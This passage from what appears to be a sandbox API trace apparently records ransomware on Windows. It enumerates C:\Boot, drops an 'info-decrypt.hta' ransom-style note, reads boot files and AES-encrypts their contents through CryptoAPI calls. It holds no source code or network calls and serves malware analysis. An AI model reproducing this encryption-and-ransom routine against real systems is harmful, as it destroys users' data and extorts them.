ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0131.254] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0131.254] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0131.254] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0131.254] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0131.254] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0131.255] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0131.255] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0131.255] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0131.255] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0131.255] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6a7f034 | out: lpFindFileData=0x6a7f034*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.255] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f2bc) returned 1 [0131.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f2c8) returned 1 [0131.299] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x6a7ed70, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0131.299] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0131.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d8) returned 1 [0131.299] GetFileAttributesExW (in: lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f254 | out: lpFileInformation=0x6a7f254*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0131.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d4) returned 1 [0131.299] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x6a7ed70, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0131.299] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ec18, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0131.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f10c) returned 1 [0131.300] CreateFileW (lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x524 [0131.300] GetFileType (hFile=0x524) returned 0x1 [0131.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f108) returned 1 [0131.300] GetFileType (hFile=0x524) returned 0x1 [0131.301] WriteFile (in: hFile=0x524, lpBuffer=0x38b6a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f1d0, lpOverlapped=0x0 | out: lpBuffer=0x38b6a88*, lpNumberOfBytesWritten=0x6a7f1d0*=0x1000, lpOverlapped=0x0) returned 1 [0131.302] WriteFile (in: hFile=0x524, lpBuffer=0x38b6a88*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f1a4, lpOverlapped=0x0 | out: lpBuffer=0x38b6a88*, lpNumberOfBytesWritten=0x6a7f1a4*=0x55e, lpOverlapped=0x0) returned 1 [0131.302] CloseHandle (hObject=0x524) returned 1 [0131.312] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x6a7ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0131.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f224) returned 1 [0131.312] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), fInfoLevelId=0x0, lpFileInformation=0x38b7aa4 | out: lpFileInformation=0x38b7aa4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400)) returned 1 [0131.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f220) returned 1 [0131.312] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x6a7ec64, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0131.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f158) returned 1 [0131.313] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0133.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df90) returned 1 [0133.502] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x6a7ed70, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0133.502] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0133.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d8) returned 1 [0133.502] GetFileAttributesExW (in: lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f254 | out: lpFileInformation=0x6a7f254*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2aeb80, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xd2aeb80, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xd2d4ce0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0133.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d4) returned 1 [0133.502] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x6a7ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0133.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f224) returned 1 [0133.502] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), fInfoLevelId=0x0, lpFileInformation=0x38ff1c8 | out: lpFileInformation=0x38ff1c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0133.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f220) returned 1 [0133.503] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x6a7ec64, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0133.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f158) returned 1 [0133.503] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x590 [0133.503] GetFileType (hFile=0x590) returned 0x1 [0133.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f154) returned 1 [0133.503] GetFileType (hFile=0x590) returned 0x1 [0133.504] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x6a7f260 | out: lpFileSizeHigh=0x6a7f260*=0x0) returned 0x10000 [0133.504] ReadFile (in: hFile=0x590, lpBuffer=0x38ff318, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6a7f20c, lpOverlapped=0x0 | out: lpBuffer=0x38ff318*, lpNumberOfBytesRead=0x6a7f20c*=0x10000, lpOverlapped=0x0) returned 1 [0133.506] CloseHandle (hObject=0x590) returned 1 [0135.715] CryptAcquireContextW (in: phProv=0x6a7f1ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f1ac*=0xbe0828) returned 1 [0137.547] CryptGenRandom (in: hProv=0xbe0828, dwLen=0x10, pbBuffer=0x3784668 | out: pbBuffer=0x3784668) returned 1 [0139.614] GetProcAddress (hModule=0x77710000, lpProcName="CryptContextAddRef") returned 0x77753168 [0139.615] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0139.615] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0139.616] CryptImportKey (in: hProv=0xbe0828, pbData=0x35dff1c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f17c | out: phKey=0x6a7f17c*=0xb7f490) returned 1 [0139.616] GetProcAddress (hModule=0x75230000, lpProcName="CryptImportKey") returned 0x752351dd [0139.616] CryptContextAddRef (hProv=0xbe0828, pdwReserved=0x0, dwFlags=0x0) returned 1 [0139.617] GetProcAddress (hModule=0x75230000, lpProcName="CryptContextAddRef") returned 0x75232e79 [0139.617] GetProcAddress (hModule=0x77710000, lpProcName="CryptContextAddRef") returned 0x77753168 [0139.617] CryptContextAddRef (hProv=0xbe0828, pdwReserved=0x0, dwFlags=0x0) returned 1 [0139.618] GetProcAddress (hModule=0x77710000, lpProcName="CryptDuplicateKey") returned 0x777531a8 [0139.618] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f16c | out: phKey=0x6a7f16c*=0xb7f4d0) returned 1 [0139.618] GetProcAddress (hModule=0x75230000, lpProcName="CryptDuplicateKey") returned 0x75234a67 [0139.618] CryptContextAddRef (hProv=0xbe0828, pdwReserved=0x0, dwFlags=0x0) returned 1 [0139.618] GetProcAddress (hModule=0x77710000, lpProcName="CryptSetKeyParam") returned 0x777377b3 [0139.619] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x35dfffc*=0x1, dwFlags=0x0) returned 1 [0139.619] GetProcAddress (hModule=0x75230000, lpProcName="CryptSetKeyParam") returned 0x75234df2 [0139.619] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x35dffc8, dwFlags=0x0) returned 1 [0139.619] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0139.619] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35e000c*, pdwDataLen=0x6a7f1d8*=0x10010, dwBufLen=0x10010 | out: pbData=0x35e000c*, pdwDataLen=0x6a7f1d8*=0x10010) returned 1 [0139.620] GetProcAddress (hModule=0x75230000, lpProcName="CryptEncrypt") returned 0x75235368 [0139.622] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0040*, pdwDataLen=0x6a7f1e0*=0x0, dwBufLen=0x10 | out: pbData=0x35f0040*, pdwDataLen=0x6a7f1e0*=0x10) returned 1 [0139.630] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyKey") returned 0x7771c51a [0139.630] CryptDestroyKey (hKey=0xb7f490) returned 1 [0139.630] CryptReleaseContext (hProv=0xbe0828, dwFlags=0x0) returned 1 [0139.630] CryptReleaseContext (hProv=0xbe0828, dwFlags=0x0) returned 1 [0139.630] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x6a7ec50, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0139.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f144) returned 1 [0139.630] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0139.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df80) returned 1 [0139.826] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x6a7ed70, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0139.826] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0139.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d8) returned 1 [0139.826] GetFileAttributesExW (in: lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f254 | out: lpFileInformation=0x6a7f254*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2aeb80, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xd2aeb80, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xd2d4ce0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0139.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d4) returned 1 [0139.826] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x6a7ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0139.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f224) returned 1 [0139.826] GetFileAttributesExW (in: lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), fInfoLevelId=0x0, lpFileInformation=0x35d4390 | out: lpFileInformation=0x35d4390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980)) returned 1 [0139.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f220) returned 1 [0139.827] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x6a7ec64, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0139.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f158) returned 1 [0139.827] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0139.827] GetFileType (hFile=0x4e0) returned 0x1 [0139.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f154) returned 1 [0139.827] GetFileType (hFile=0x4e0) returned 0x1 [0139.827] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x6a7f260 | out: lpFileSizeHigh=0x6a7f260*=0x0) returned 0x76980 [0141.307] ReadFile (in: hFile=0x4e0, lpBuffer=0x481eac0, nNumberOfBytesToRead=0x76980, lpNumberOfBytesRead=0x6a7f20c, lpOverlapped=0x0 | out: lpBuffer=0x481eac0*, lpNumberOfBytesRead=0x6a7f20c*=0x76980, lpOverlapped=0x0) returned 1 [0141.337] CloseHandle (hObject=0x4e0) returned 1 [0141.337] CryptAcquireContextW (in: phProv=0x6a7f1ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f1ac*=0xbe0828) returned 1 [0141.338] CryptGenRandom (in: hProv=0xbe0828, dwLen=0x10, pbBuffer=0x36b48d4 | out: pbBuffer=0x36b48d4) returned 1 [0143.948] CryptImportKey (in: hProv=0xbe0828, pbData=0x35bc09c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f17c | out: phKey=0x6a7f17c*=0xb7f010) returned 1 [0143.949] CryptContextAddRef (hProv=0xbe0828, pdwReserved=0x0, dwFlags=0x0) returned 1 [0143.949] CryptContextAddRef (hProv=0xbe0828, pdwReserved=0x0, dwFlags=0x0) returned 1 [0143.949] CryptDuplicateKey (in: hKey=0xb7f010, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f16c | out: phKey=0x6a7f16c*=0xb7f610) returned 1 [0143.949] CryptContextAddRef (hProv=0xbe0828, pdwReserved=0x0, dwFlags=0x0) returned 1 [0143.949] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x4, pbData=0x35bc17c*=0x1, dwFlags=0x0) returned 1 [0143.949] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x1, pbData=0x35bc148, dwFlags=0x0) returned 1 [0143.949] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44d94b0*, pdwDataLen=0x6a7f1d8*=0x76990, dwBufLen=0x76990 | out: pbData=0x44d94b0*, pdwDataLen=0x6a7f1d8*=0x76990) returned 1 [0143.954] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35bc1a4*, pdwDataLen=0x6a7f1e0*=0x0, dwBufLen=0x10 | out: pbData=0x35bc1a4*, pdwDataLen=0x6a7f1e0*=0x10) returned 1 [0143.955] CryptDestroyKey (hKey=0xb7f010) returned 1 [0143.955] CryptReleaseContext (hProv=0xbe0828, dwFlags=0x0) returned 1 [0143.955] CryptReleaseContext (hProv=0xbe0828, dwFlags=0x0) returned 1 [0143.955] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x6a7ec50, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0143.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f144) returned 1 [0143.955] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0143.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df80) returned 1 [0143.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0143.957] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0143.957] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0143.957] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f010 [0143.958] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.958] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0143.958] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0143.958] FindClose (in: hFindFile=0xb7f010 | out: hFindFile=0xb7f010) returned 1 [0143.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0143.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0143.958] SetThreadErrorMode 